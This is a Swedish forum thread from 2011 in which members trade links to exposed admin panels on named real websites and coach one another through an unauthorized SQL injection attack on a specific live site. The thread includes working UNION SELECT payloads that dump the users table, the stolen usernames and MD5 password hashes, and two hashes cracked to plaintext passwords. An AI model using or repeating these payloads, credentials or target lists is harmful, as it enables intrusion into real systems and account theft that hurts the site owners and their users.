1. Dator och IT
  2. IT-säkerhet

Samling av sidor med säkerhetsbrister - Del 2

Svara
2011-02-25, 13:55
  #2245
vicious
Medlem
Citat:
Ursprungligen postat av TheDetektiv
Synd att det inte var sån "Login" sida.. Då kunde man haffat åt sig usernames & passwords
Börjar lära mig lite grann hihi

här kan du logga in å fortsätta leka

http://drzipe.se/phpmyadmin/
Citera
2011-02-26, 02:55
  #2246
TheDetektiv
Medlem
Citat:
Ursprungligen postat av vicious
här kan du logga in å fortsätta leka

http://drzipe.se/phpmyadmin/

Haha tackar, äventyret fortsätter på min resa till att lära mig hur det fungerar..
Har börjat lära mig lite osv...

Men jag har några frågor ..
Jag kunde ju få fram all information i alla tabeller & så..
Fast de stod "inget" om phpmyadmin ( alltså username & password tex.. )

Vart lagras detta då? går det att få "tag" i det ? ^^
Citera
2011-02-26, 14:20
  #2247
fooztr
Medlem
fooztrs avatar
PHPadmin
Kod: 
http://www.avnet.idv.tw/phpMyAdmin/
http://grasshopper.nyi.net/public_html/Adm1nNy1/read_dump.php
http://125.16.213.243/phpmyadmin/
http://www.cruising.at/

Akta er för honeypots.

Fakta om honeypots:
Kod: 
In computer terminology, a honeypot is a trap set to detect, deflect, or in some manner counteract attempts at unauthorized use of information systems. Generally it consists of a computer, data, or a network site that appears to be part of a network, but is actually isolated and monitored, and which seems to contain information or a resource of value to attackers.
Citera
2011-02-26, 18:06
  #2248
Plate
Medlem
http://kulturdirekt.se/event.php?id=3054&show=93557

/admin
/phpmyadmin
/admin/login.php

GL
Citera
2011-02-26, 18:18
  #2249
TheDetektiv
Medlem
Hejsan.

Jag testar SQLi på denna ->

Kommit fram hit :

http://www.gocontempo.com/pages.php?id=-3 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 ,13,14 from information_schema.columns where table_schema=database()--

Databas : gocontem_contempo

Tabeller :

Där fastna jag..
Jag är ju inne om man säger så :P Jag får fram columns från hela "databasen" men inte från en viss speciell tabell...

Och jag försöker med
ID
campainID
som finns på adtrackz_actions ( bara för att leka med tanken )
Fast sidan är hel tom.. Som om det inte finns information där inne..

Har fastnat så.. Ni kan väl försöka hjälpa mig (h) eller göra det & se och säga hur/eller vad "felet" var jag gjorde
Citera
2011-02-26, 18:26
  #2250
ant'
Medlem
ant's avatar
Citat:
Ursprungligen postat av TheDetektiv
Hejsan.

Jag testar SQLi på denna ->

Kommit fram hit :

http://www.gocontempo.com/pages.php?id=-3 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 ,13,14 from information_schema.columns where table_schema=database()--

Databas : gocontem_contempo

Tabeller :

Där fastna jag..
Jag är ju inne om man säger så :P Jag får fram columns från hela "databasen" men inte från en viss speciell tabell...

Och jag försöker med
ID
campainID
som finns på adtrackz_actions ( bara för att leka med tanken )
Fast sidan är hel tom.. Som om det inte finns information där inne..

Har fastnat så.. Ni kan väl försöka hjälpa mig (h) eller göra det & se och säga hur/eller vad "felet" var jag gjorde
Såhär ska man göra:
Citat:
http://www.gocontempo.com/pages.php?id=-3 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 ,13,14 from information_schema.columns where table_name=0x74626c7573657273--
Citat:
http://www.gocontempo.com/pages.php?id=-3 union select 1,2,3,group_concat(0x3c62723e,UserID,0x3a,UserName ,0x3a,UserPwd),5,6,7,8,9,10,11,12 ,13,14 from tblusers--
Citera
2011-02-26, 18:28
  #2251
PostWhore
Medlem
PostWhores avatar
Citat:
Ursprungligen postat av TheDetektiv
Hejsan.

Jag testar SQLi på denna ->

Kommit fram hit :

http://www.gocontempo.com/pages.php?id=-3 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 ,13,14 from information_schema.columns where table_schema=database()--

Databas : gocontem_contempo

Tabeller :

Där fastna jag..
Jag är ju inne om man säger så :P Jag får fram columns från hela "databasen" men inte från en viss speciell tabell...

Och jag försöker med
ID
campainID
som finns på adtrackz_actions ( bara för att leka med tanken )
Fast sidan är hel tom.. Som om det inte finns information där inne..

Har fastnat så.. Ni kan väl försöka hjälpa mig (h) eller göra det & se och säga hur/eller vad "felet" var jag gjorde

Det var ändå inget roligt :P
Citera
2011-02-26, 18:41
  #2252
TheDetektiv
Medlem
Citat:
Ursprungligen postat av PostWhore
Det var ändå inget roligt :P

Nah, inte riktigt.. Fast detta är bara till mig själv som utbildningssyfte hihi

Och man kan nog förstöra det för dom.. Fast lite elakt dock :P du kan "beställa" saker till andra människor osv lol ^^

Fast fast, någon som kan hjälpa mig vidare där? (A)
Citera
2011-02-26, 18:59
  #2253
limpwald
Medlem
limpwalds avatar
Citat:
Ursprungligen postat av TheDetektiv
Nah, inte riktigt.. Fast detta är bara till mig själv som utbildningssyfte hihi

Och man kan nog förstöra det för dom.. Fast lite elakt dock :P du kan "beställa" saker till andra människor osv lol ^^

Fast fast, någon som kan hjälpa mig vidare där? (A)

Du kanske missade att ant' visade dig på ett extremt exemplariskt sätt hur man skall gå tillväga?

Citat:
Ursprungligen postat av ant'
Såhär ska man göra:

Citat:
http://www.gocontempo.com/pages.php?id=-3 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12 ,13,14 from information_schema.columns where table_name=0x74626c7573657273--

Citat:
http://www.gocontempo.com/pages.php?id=-3 union select 1,2,3,group_concat(0x3c62723e,UserID,0x3a,UserName ,0x3a,UserPwd),5,6,7,8,9,10,11,12 ,13,14 from tblusers--
Citera
2011-02-26, 19:00
  #2254
Plate
Medlem
Citat:
Ursprungligen postat av TheDetektiv
Nah, inte riktigt.. Fast detta är bara till mig själv som utbildningssyfte hihi

Och man kan nog förstöra det för dom.. Fast lite elakt dock :P du kan "beställa" saker till andra människor osv lol ^^

Fast fast, någon som kan hjälpa mig vidare där? (A)

Underbar säkerhet på den sidan

http://www.gocontempo.com/admin/admin.php
Citera
2011-02-26, 19:30
  #2255
TheDetektiv
Medlem
Citat:
Ursprungligen postat av limpwald
Du kanske missade att ant' visade dig på ett extremt exemplariskt sätt hur man skall gå tillväga?

Ja, jag missade det ^^
Skuille hexat tblusers ( 74626c7573657273 ) .. Då fick jag fram info om columbs för tblusers tabellen sen är det bara att plocka ut information

Tackar Man lär ju sig av sina "misstag" hihi ^^

Username : Password
contempo:043d9d7cd5afa18257b77164bc91205e
contempo:416947dc3ddd5871659ee142273ffa95
gocontempo:27b811b22de87faa7925ae3c2a0337fe
sample:1b4ea4c5cc5181229340c1c188baad6f

^^
Fast jag har försökt hittat "dekrypterare" till MD5 ( antar att 043d9d7cd5afa18257b77164bc91205e
är MD5? ) :P står "no result found" på vissa sidor..
Kan man inte köra ett enkelt php script som konverterar md5 till string? så som md5(hej) = krypterat hej ..
Citera
2011-02-26, 19:37
  #2256
limpwald
Medlem
limpwalds avatar
Citat:
Ursprungligen postat av TheDetektiv
Ja, jag missade det ^^
Skuille hexat tblusers ( 74626c7573657273 ) .. Då fick jag fram info om columbs för tblusers tabellen sen är det bara att plocka ut information

Tackar Man lär ju sig av sina "misstag" hihi ^^

Username : Password
contempo:043d9d7cd5afa18257b77164bc91205e
contempo:416947dc3ddd5871659ee142273ffa95
gocontempo:27b811b22de87faa7925ae3c2a0337fe
sample:1b4ea4c5cc5181229340c1c188baad6f

^^
Fast jag har försökt hittat "dekrypterare" till MD5 ( antar att 043d9d7cd5afa18257b77164bc91205e
är MD5? ) :P står "no result found" på vissa sidor..
Kan man inte köra ett enkelt php script som konverterar md5 till string? så som md5(hej) = krypterat hej ..

MD5 mycket riktigt.

contempo:J28131720c
contempo:ih8hackers2day
Citera
Svara

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in